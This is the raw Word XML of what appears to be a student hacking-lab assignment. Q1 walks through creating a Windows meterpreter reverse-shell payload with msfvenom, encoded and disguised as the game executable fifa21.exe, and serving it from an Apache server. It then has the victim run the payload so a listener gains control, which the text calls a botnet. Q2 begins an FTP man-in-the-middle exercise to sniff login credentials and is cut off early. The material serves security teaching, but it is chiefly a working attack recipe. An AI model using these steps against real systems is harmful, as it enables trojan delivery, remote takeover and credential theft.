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6D03940" w14:paraId="5E5787A5" wp14:textId="003D4337">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Q1. Create Payload for Windows. Transfer the payload to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>victims</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> machine and exploit the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>victims</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> machine?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="1A2ED298" w14:textId="6662225C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>ANS: This is the task to hack windows. The following steps need to be taken to do the task:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="3FF28D2B" w14:textId="6AE0DAFF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D03940">
        <w:rPr/>
        <w:t>Create a web server. Here Kali Linux will be my web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="3B3E9E50" w14:textId="2B06A807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="46D03940">
        <w:rPr/>
        <w:t>Create a venom I.e. exploit/malicious payload and host it on the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="17C216E5" w14:textId="4DB965E6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="46D03940">
        <w:rPr/>
        <w:t>Let the victim download the venom or malicious file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="1144EFEC" w14:textId="68BAEDCC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="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Wait with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="5C7D55C9" w14:textId="702DF9DE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="46D03940">
        <w:rPr/>
        <w:t>Let victim execute the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="037DB207" w14:textId="7046A23B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Kali Linux- 192.168.216.100    Victim-192.168.216.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="1BF47E7C" w14:textId="19C6DD9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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6D03940" w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Create a web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="3497D949" w14:textId="4DC57A44">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>In order to make any server a web server we need to first be the root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="70FFFBA9" w14:textId="25E6A203">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">sudo su - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="6F4DAFCF" w14:textId="67354810">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="26BDE5CB" wp14:anchorId="04F117BB">
            <wp:extent cx="4572000" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122075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0bee10a8b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64634F52" w14:textId="7A44ACDD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Then we need to install the packages required for a server to be converted into a web server. As kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>debian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> hence we install apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="56BD56F4" w14:textId="523D7D51">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>apt install apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="2963CFED" w14:textId="5564D291">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="22DF108D" wp14:anchorId="1F7F546C">
            <wp:extent cx="4572000" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1196908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ef97ba92a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625308CA" w14:textId="0F4D027E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Now the web server is installed but the services are not running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="08E48DD9" w14:textId="2ECAD9C9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>ctl</w:t>
      </w:r>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> enable apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="4F704AB2" w14:textId="2D91FE68">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>ctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> start apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="678A6806" w14:textId="53D644EA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="59669C38" wp14:anchorId="1BB66D0E">
            <wp:extent cx="4572000" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="644782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ff6f3c44c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1CCF4C54" w14:textId="7435A2CD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Now we need to navigate to html directory in var.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="73E187FA" w14:textId="0243F7A6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">cd /var/www/html </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="694D6CF5" w14:textId="6B5AD142">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Within html we create a new directory named </w:t>
      </w:r>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Fifa</w:t>
      </w:r>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>. This is the directory which will hold our venom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="011BB4AC" w14:textId="79C23D9A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>mkdir</w:t>
      </w:r>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> Fifa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="52447CDC" w14:textId="12AA8A74">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Now we enter in this directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="7EAE726E" w14:textId="0790A457">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Fifa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="141695FB" w14:textId="75087F95">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="548FBE86" wp14:anchorId="6AA59600">
            <wp:extent cx="4572000" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1495899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90a8ab27e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7801F010" w14:textId="61A60F9F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Now the creation of Web server has been completed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="20408BF3" w14:textId="11E4BA10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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6D03940" w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Create a venom I.e. exploit/malicious payload and host it on the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="289981F0" w14:textId="0B761812">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Now we need to create our venom i.e. our malicious payload drafted as an executable application named as fifa21.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="542D1A3B" w14:textId="3F0E2534">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> –p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> –platform windows –a x86 –e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> –b "\x00” LHOST=192.168.216.100 -f exe &gt; /var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Fifa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>/fifa21.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="72E19FF6" w14:textId="7366D704">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="3A6C47C7" wp14:anchorId="759869CB">
            <wp:extent cx="5772150" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="952749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b5fced4bf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7B2D59B9" w14:textId="543F685A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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6D03940" w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Let the victim download the venom or malicious file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="09F550CD" w14:textId="58DD4057">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Let the victim browse 192.168.216.100/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Fifa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download fifa21.exe from there.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="69DD39DB" w14:textId="619FB601">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="72696EC9" wp14:anchorId="706078C2">
            <wp:extent cx="4572000" cy="3286125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69507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cd7325b13549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531F1407" w14:textId="288844F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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6D03940" w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Wait with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="46D03940" w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="46D03940" w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="4917C6DA" w14:textId="7C44238D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>We need to start msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="3A4EF85D" w14:textId="39DBA0E0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="3CBD9718" wp14:anchorId="072FC0A4">
            <wp:extent cx="4572000" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073301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7a5aa6a1b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7570FF79" w14:textId="63A4B70B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">We need to start then the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> to listen to the sessions generated from victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="607F5AC8" w14:textId="5979B8F9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="6C1D163E" wp14:anchorId="6B26534C">
            <wp:extent cx="4572000" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124120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0400c0974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5E62AA40" w14:textId="78B245C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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6D03940" w:rsidR="46D03940">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Let victim execute the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="6314C23C" w14:textId="3489DE3D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="7A3CB984" wp14:anchorId="44177C95">
            <wp:extent cx="4572000" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2091623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5b94df546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159F3DA1" w14:textId="4D83DB2A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>On execution the session gets established with kali or webserver or CnC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="5DC9DD1A" w14:textId="2AAC7541">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="6DC31189" wp14:anchorId="35A3DD67">
            <wp:extent cx="4572000" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1689378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9c6c4e839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FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="696F083A" w14:textId="73A5B1CD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Hence we have successfully hacked windows and we have turned our victim into a BOTNET.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="696F2AD9" w14:textId="648A4A83">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Now we can get into an individual session and can execute the commands we like and control windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="6BBDFB55" w14:textId="6F166B65">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Q2. Create an FTP server. Access the FTP server from Windows Command prompt. Do a MITM and username and password of FTP transaction using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="65E039AC" w14:textId="0CDC2594">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">ANS: This is basically Man </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> Middle Attack. The Different steps to do this attack are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="59A90F8D" w14:textId="357D6F1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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D03940">
        <w:rPr/>
        <w:t>All systems should be in same Network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="388120D7" w14:textId="5AF5498C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">In my case </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="4D328A4A" w14:textId="3A386B5C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Kali Linux:192.168.216.100   FTP Server:192.168.216.</w:t>
      </w:r>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>101  System</w:t>
      </w:r>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> from where ftp is accessed:192.168.216.102</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="4E65189F" w14:textId="7E615A97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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D03940">
        <w:rPr/>
        <w:t>Create an FTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="01B3B279" w14:textId="0968438E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Go to Server Manager-Manage-Add Roles &amp; Features-web server-FTP server-Install </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6123FF15" w:rsidP="46D03940" w:rsidRDefault="6123FF15" w14:paraId="36FC2D95" w14:textId="40B14C0E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="52ADA604" wp14:anchorId="0F36D7B4">
            <wp:extent cx="4572000" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2131320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f2b4d980b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4C583F71" w14:textId="2076AE48">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="539767D5" wp14:anchorId="1DF7DB3C">
